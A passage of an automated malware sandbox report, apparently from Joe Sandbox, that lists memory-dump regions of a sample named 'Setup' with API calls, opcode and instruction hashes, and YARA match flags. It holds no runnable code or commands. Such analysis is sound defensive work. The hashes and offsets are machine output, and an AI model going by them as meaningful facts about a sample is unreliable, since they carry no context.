                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,031CF087,?,20001004,00000000,00000002,?,?,031CE679), ref: 031D4244
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00037050,031A79C5), ref: 031A8043
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: x)
                                                                                                                                                                                                                                                      • API String ID: 0-19961359
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: null
                                                                                                                                                                                                                                                      • API String ID: 0-634125391
                                                                                                                                                                                                                                                      • Opcode ID: 818673aa7d7ebba71294e4587daa884cc46ee6c060da4e2221e471fe77261fab
                                                                                                                                                                                                                                                      • Instruction ID: 182a375b3183a6ac4ed012188af196555808b3ae36d4a502f03aafb97d73476a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 818673aa7d7ebba71294e4587daa884cc46ee6c060da4e2221e471fe77261fab
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44519C34B00A089BCA24FFA8A4A17ADB3A9DB4D211F04459EE84B8F6C0DB355A55DBC5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 4fddac3d857f79d5a84b62810d3bf9cc1ebf1fb09415b94e6bfa58a0d68cb4e3
                                                                                                                                                                                                                                                      • Instruction ID: c654cd5c5cb2fb924603660522e1ff30c5094d1cfa14b8afe5f5393190620442
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fddac3d857f79d5a84b62810d3bf9cc1ebf1fb09415b94e6bfa58a0d68cb4e3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44327E74A0020A9FCF28DF9CC985ABEB7B5EF45704F1441A8DC49A7345E732AE56CB90
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 06d0832daac4096cbec4eceaa45f15051488fc629a1eda780bbd9d86095083fd
                                                                                                                                                                                                                                                      • Instruction ID: 2e52d793bafa2762374e8efefc6b383969a65ad187ee94c88848963164b6fd51
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06d0832daac4096cbec4eceaa45f15051488fc629a1eda780bbd9d86095083fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A752E3309017548FC739CF29C8E4AA6BBB1FF4A300F5909EDC59A5B762D7319982CB14
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: e6f7ffc1c26a17055db2c2b951e3ec8ecc0fce23b4e7f66a274c8a06c231446e
                                                                                                                                                                                                                                                      • Instruction ID: dd684d5eb4136c2ad60a4ce26f8805eb8ce2e8e9c7415e81be1a2b8e08dc419e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6f7ffc1c26a17055db2c2b951e3ec8ecc0fce23b4e7f66a274c8a06c231446e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB5212309007648FC765CF29C8D0AAABBF1FF96308F1515EDC58A1B762D739A988CB14
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 606e2de3ed15581111ee4a9a646e76bffb3b6ea89bfaa3ace4b1cfc856f5efa2
                                                                                                                                                                                                                                                      • Instruction ID: 3a9a757039dfc2057ee603074e066283c4a9bef9a6ff99d28ff8eb7d53cbe90f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 606e2de3ed15581111ee4a9a646e76bffb3b6ea89bfaa3ace4b1cfc856f5efa2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7222270A01B108FC724CF29C99066ABBF1FF89710B684E6DC6A697B90D371B586CB50
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 2f9b006239a9958a019966b368873b8ca1a2ecce9190c9ba7726cdb2e54aa477
                                                                                                                                                                                                                                                      • Instruction ID: 82abc03a91900d4fa8513ccbb6168e275293cc1f87dda3871cd6de53ebca187e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f9b006239a9958a019966b368873b8ca1a2ecce9190c9ba7726cdb2e54aa477
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33223470A01B20CFC724CF69C68066ABBF1FF95718B604A2DCAA697B50D371F949CB50
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 5907baa6aa61c977add9a9c4716c18e54f67bc42efd09e2a59eab83d35fb377c
                                                                                                                                                                                                                                                      • Instruction ID: fba79255a894ccfd1b43dc06926d57230456d1b28b8923ddadd1c00aadc2ae19
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5907baa6aa61c977add9a9c4716c18e54f67bc42efd09e2a59eab83d35fb377c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1F13AB1605B508FE724CF29C84076BB7E1FB94318F144A2DE9AA87790E775E908CB52
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: d47aac4bcd569f8eb9e6d20ce120a0f5f3cec5991d10a5286aa0929d64278ccf
                                                                                                                                                                                                                                                      • Instruction ID: e01a6e6a29963a7d4092722f4009a65e82c3d3b278a103f52af03effe13c0d30
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d47aac4bcd569f8eb9e6d20ce120a0f5f3cec5991d10a5286aa0929d64278ccf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4E10872E016298FDF08CF99D8915EDBBB2BFC9310B1A816ED45677744CB306915CBA0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: d47aac4bcd569f8eb9e6d20ce120a0f5f3cec5991d10a5286aa0929d64278ccf
                                                                                                                                                                                                                                                      • Instruction ID: 78d47a4e4f0364d69b15d441dd01b7f9d3015dd43bba216906777e28fe27e9d8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d47aac4bcd569f8eb9e6d20ce120a0f5f3cec5991d10a5286aa0929d64278ccf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40E1E672E146298FDF18CF99D8A15EEBBB2BBC8310B1A816DD85667344CB306D05CB94
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharConcurrency::cancel_current_taskMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1164694947-0
                                                                                                                                                                                                                                                      • Opcode ID: b28045992c86daa8b6278691ecb94840efea1f7acfe60e6fd7628efc4a63bed8
                                                                                                                                                                                                                                                      • Instruction ID: 7b2945dca61564d7e92d8b8b34d713ad44c638111b2bdfd29f7950e214f7e02a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b28045992c86daa8b6278691ecb94840efea1f7acfe60e6fd7628efc4a63bed8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08025EB4E10308DBDB14EFB8C91579D7BB1AF4A318F20838DE0252F2D1DB764A468B95
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 3fba6bd46ba5e00d84591e943660ae45b34cdf2e29d98a458084303305cef74b
                                                                                                                                                                                                                                                      • Instruction ID: 43b554a7004fb262cc0fc4a570a462db858daf3ae420e0793fb376d4c11fc2aa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fba6bd46ba5e00d84591e943660ae45b34cdf2e29d98a458084303305cef74b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E024E70E10348ABDF05EFA8C91579DBBB2EF45314F20839DE0246B3D1DBB64A459BA1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 4a92f048097e26d9873f960ba8abf55dd9fbbc8a4799bdda7348b9c8793970de
                                                                                                                                                                                                                                                      • Instruction ID: c42c8b94ebdcc9fd2ca02d32d93538dbd2d76408737b8aed8db870d55e8c6d43
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a92f048097e26d9873f960ba8abf55dd9fbbc8a4799bdda7348b9c8793970de
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86127A30D01298DADF16DFA4C914BDDBBB1BF15308F2082DDD4482B292DBB55A89CFA1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: c54c717e8c7374b91f726f8848519e71977d048340b68d87ea1a8ecac686a586
                                                                                                                                                                                                                                                      • Instruction ID: f214346419be7551e63271df9c91cd11ee5f52155ffdc8f605afdce8d6cad063
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c54c717e8c7374b91f726f8848519e71977d048340b68d87ea1a8ecac686a586
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73F12270901B11CFC724CF29CA9466ABBF1FF89710B684E6DC6A697A90D331F586CB50
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: fa119e962551f4dff5afdf421d10cce9a7751291de6802ce47c0ac7518f2a18d
                                                                                                                                                                                                                                                      • Instruction ID: 781b2605bd5c8f479ac981dd615628765327cc59ac53c2d3ca6d86c9950dec16
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa119e962551f4dff5afdf421d10cce9a7751291de6802ce47c0ac7518f2a18d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DF13570901B20CFC725CF29C68066ABBF1FF55718B604A1DDAA697B90D331F949CB50
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 1eed353ec2c3ec7f88782ac18427221c9eeb8884f4cc1619190387fb97b8f015
                                                                                                                                                                                                                                                      • Instruction ID: b53c30135830a8ee2a1754d6b8af597ac0ebbdab7643ab764af0bae3d664b3ee
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1eed353ec2c3ec7f88782ac18427221c9eeb8884f4cc1619190387fb97b8f015
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57E1A435A002299BDB28CF58D8947E9B7B1FF89344F5981F9DA4DD7244EB309A85CF80
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: da7258bdf34ee033e872ced38b54c25406d4706b4beecc139be1cbd7914a0eb8
                                                                                                                                                                                                                                                      • Instruction ID: 4bd5b43fd03c3d02f9bacb7399535673b07d89eafacd18c362b11f4e3ddf9458
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da7258bdf34ee033e872ced38b54c25406d4706b4beecc139be1cbd7914a0eb8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88E19431A002698BDB68CF58D9807E9B7B1FF99308F5481E9DA4D97340DB34AE89CF40
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 1f00b2175e6e94bfd41b5e22223dd18c968c63b6da4519e699c60aa5f7e9f522
                                                                                                                                                                                                                                                      • Instruction ID: 4a2bed9fabd8f3f8e3f48f55b7b3e880bf8eff1c13ad2258e3ab245ca49fde69
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f00b2175e6e94bfd41b5e22223dd18c968c63b6da4519e699c60aa5f7e9f522
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9D17171209B818FD325CF6CC84065AFBF1BF9A200F488A5DE9D587752D734E519CBA2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharConcurrency::cancel_current_taskMultiWide
                                                                                                                                                                                                                                                      • API String ID: 1164694947-0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 893c7d9045ba199658c724d9c3563c1e06ac364c42555fc515a1bc0e281d522b
                                                                                                                                                                                                                                                      • Instruction ID: e0f160190564d397336474c90374b36f9d7b46df272439b24a7d0f20909e3622
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 893c7d9045ba199658c724d9c3563c1e06ac364c42555fc515a1bc0e281d522b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0451F4B3E011256BDB08DAA9CC819BFF7ABDBCC210B05817EFD09EB240D6359D1086E0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 893c7d9045ba199658c724d9c3563c1e06ac364c42555fc515a1bc0e281d522b
                                                                                                                                                                                                                                                      • Instruction ID: 8a61ccec57a48f2e5fccdb093d9b8079de7ca348382ed605e47a0ab98a1ee283
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 893c7d9045ba199658c724d9c3563c1e06ac364c42555fc515a1bc0e281d522b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3651EDB3E011256BDB18DAA98C559BFF7ABDBC8310F05826DF919E7340DA359D018BE0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: f03dc02d1d7a69d8cdcde549a400ed3af10a2fd2be16b5737eafb4ac33772034
                                                                                                                                                                                                                                                      • Instruction ID: 88947ea92c27c28bb329af6de87bbf246d47f6a74ab564a6091cc02b223531a8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f03dc02d1d7a69d8cdcde549a400ed3af10a2fd2be16b5737eafb4ac33772034
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A616BB6E0051A8FDF18CF9CC8806AEF7B5FB48310B15866AD825E7640E730A911CBD4
                                                                                                                                                                                                                                                      Memory Dump Source
